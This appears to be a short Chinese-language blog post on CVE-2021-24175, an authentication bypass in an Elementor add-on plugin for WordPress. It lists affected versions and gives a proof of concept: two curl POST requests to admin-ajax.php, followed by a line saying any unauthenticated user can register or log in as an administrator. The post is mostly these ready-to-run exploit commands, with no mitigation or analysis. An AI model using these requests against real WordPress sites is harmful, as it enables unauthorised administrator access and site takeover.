# CVE-2021-24175 WordPress Elementor Page Builder Plus插件身份驗證繞過漏洞
==影響版本==
Elementor Page Builder <4.1.7 ==POC==
curl -X POST –data action=theplus_ajax_login –data email=admin -iLSS https://example.com/wp-admin/admin-ajax.php curl -X POST –data action=theplus_google_ajax_register –data email=admin –data nonce=a -iLSS https://example.com/wp-admin/admin-ajax.php
“theplus_google_ajax_register” AJAX請求還可以允許任何未經身份驗證的用戶創建具有任意角色的帳戶,例如admin,然後登錄。
html:
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容